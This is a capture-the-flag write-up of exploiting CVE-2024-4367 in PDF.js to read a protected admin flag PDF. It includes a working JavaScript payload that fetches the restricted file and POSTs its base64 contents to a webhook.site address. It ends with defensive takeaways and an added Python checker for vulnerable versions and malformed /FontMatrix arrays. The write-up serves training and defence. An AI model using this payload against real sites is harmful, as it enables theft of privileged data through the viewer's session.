1753c web/Do Not Cheat

My solution for the 1753c web/Do Not Cheat challenge.

Challenge overview

Do Not Cheat

This challenge involved exploiting the CVE-2024-4367 vulnerability in PDF.js to gain access to a hidden flag in a protected admin area.

Analysis

Reconnaissance

Upon visiting the challenge site, I was presented with a webpage containing various “cheatsheets” available for download:

Do Not Cheat Homepage

Examining the website revealed a collection of publicly accessible PDF documents. Each PDF was rendered in the browser using PDF.js, as was evident from the UI elements in the viewer.

Do Not Cheat document endpoint

Discovery Phase

Looking at the source code of the page, I found something interesting:

Do Not Cheat flag path

The page contained a JavaScript array of files, including a hidden Flag file at the path /app/admin/flag.pdf that wasn’t linked from the main interface. Attempting to access this file directly resulted in an access-denied response:

Do Not Cheat access denied

Further investigation revealed that the site was using PDF.js version 4.1.392:

Do Not Cheat pdfjsversion

Research showed this version was vulnerable to CVE-2024-4367, a security flaw that allows arbitrary JavaScript execution through malicious PDF files:

Do Not Cheat cve LINK TO CVE

Exploitation

The vulnerability allows JavaScript execution in the PDF.js context when a malicious PDF is loaded. Since the challenge is called “Do Not Cheat,” I suspected I needed to use this vulnerability to access the flag PDF in the admin area.

My approach:

  • Set up a server
  • Create a malicious PDF that would fetch the admin flag file and send it to my webhook
  • Host and access this PDF to trigger the exploit

Setting Up the Server

I set up a simple Python server with CORS headers enabled:

Do Not Cheat server

Then I used webhook.site to capture any data that would be exfiltrated from the challenge site.

Creating the Exploit

The key challenge was crafting an XHR request that would:

  • Fetch the admin flag PDF
  • Send the contents to my webhook

After several attempts, I created a payload that successfully exfiltrated the flag PDF:

```javascript
// Same-origin request for the restricted flag PDF, issued from the
// compromised PDF.js context.
var xhr = new XMLHttpRequest();
xhr.open('GET', '/app/admin/flag.pdf', true);
xhr.responseType = 'arraybuffer';
xhr.onload = function () {
  if (this.status === 200) {
    var blob = new Blob([this.response], { type: 'application/pdf' });
    var reader = new FileReader();
    reader.onload = function (e) {
      // e.target.result is a data: URL; keep only the base64 body after the comma.
      var exfilXhr = new XMLHttpRequest();
      exfilXhr.open('POST', 'https://webhook.site/[WEBHOOK_ID]', true);
      exfilXhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
      exfilXhr.send('flag=' + encodeURIComponent(e.target.result.split(',')[1]));
    };
    reader.readAsDataURL(blob);
  }
};
xhr.send();
```

I used a tool for generating malicious PDFs with the CVE-2024-4367 vulnerability, injecting my payload. LINK TO POC AUTHOR

First I tried to load it and it worked:

Do Not Cheat pdf loaded

Extracting the Flag

After hosting the malicious PDF and reporting it to the admin through the challenge site, the PDF.js vulnerability was triggered and my payload executed. The base64-encoded content of the flag PDF was successfully sent to my webhook:

Do Not Cheat webhook

I decoded the base64 content and saved it as a PDF file, revealing the flag:

Do Not Cheat flag

Final flag: 1753c{m0zz4r3ll4_pdfjs_h4d_4_bug}

Key takeaways

  1. Keep libraries updated
    • The challenge demonstrated how an outdated version of PDF.js (4.1.392) with a known vulnerability (CVE-2024-4367) can be exploited. Always maintain current versions of libraries and frameworks to prevent exploitation of known security flaws.
  2. Client-side security cannot be trusted
    • This exploit demonstrated that client-side security mechanisms can be bypassed. The PDF viewer was intended to display public documents, but once code execution was obtained in the viewer's JavaScript context, it could be leveraged to fetch restricted content within the same origin, using the privileges of the admin who viewed the PDF.

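As an added defensive example (not part of the original write-up), the script below performs two checks a maintainer of a site like this would want: it compares a PDF.js version string against the release that fixed CVE-2024-4367 (4.2.67), and it flags uncompressed /FontMatrix arrays that hold anything other than six numbers, since the bug stemmed from such a value being interpolated into generated JavaScript. The sample PDF fragments, the version constant and the function names are mine, not the challenge's files.

```python
import re

# Release that fixed CVE-2024-4367 (stated here as a known fact, not taken from the write-up).
PATCHED_PDFJS = (4, 2, 67)

# A /FontMatrix array must hold exactly six numbers. The CVE was triggered by a
# non-numeric value there being interpolated unescaped into generated JavaScript.
FONTMATRIX_RE = re.compile(rb"/FontMatrix\s*\[(.*?)\]", re.DOTALL)
NUMBER_RE = re.compile(rb"^[+-]?(?:\d+\.?\d*|\.\d+)$")

# Constructed sample PDF fragments (not real files from the challenge).
BENIGN_PDF = (b"%PDF-1.4\n1 0 obj\n<< /Type /Font /Subtype /Type1 "
              b"/FontMatrix [0.001 0 0 0.001 0 0] >>\nendobj\n")
SUSPICIOUS_PDF = (b"%PDF-1.4\n1 0 obj\n<< /Type /Font /Subtype /Type1 "
                  b"/FontMatrix [1 0 0 1 0 (x)] >>\nendobj\n")


def is_patched_pdfjs_version(version: str) -> bool:
    """True if a PDF.js version string such as '4.1.392' is at or past the fix release."""
    parts = tuple(int(p) for p in version.strip().lstrip("v").split("."))
    return parts >= PATCHED_PDFJS


def suspicious_fontmatrix_entries(pdf_bytes: bytes) -> list:
    """Return (offset, array_body) for every /FontMatrix that is not six plain numbers.

    Only uncompressed objects are inspected; inflate FlateDecode streams first
    (e.g. with a PDF library), or fonts inside object streams will be missed.
    """
    findings = []
    for m in FONTMATRIX_RE.finditer(pdf_bytes):
        body = m.group(1)
        tokens = body.split()
        if len(tokens) != 6 or any(not NUMBER_RE.match(t) for t in tokens):
            findings.append((m.start(), body.decode("latin-1", "replace")))
    return findings


if __name__ == "__main__":
    print("4.1.392 patched?", is_patched_pdfjs_version("4.1.392"))
    print("benign:", suspicious_fontmatrix_entries(BENIGN_PDF))
    print("suspicious:", suspicious_fontmatrix_entries(SUSPICIOUS_PDF))
```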
This post is licensed under CC BY 4.0 by the author.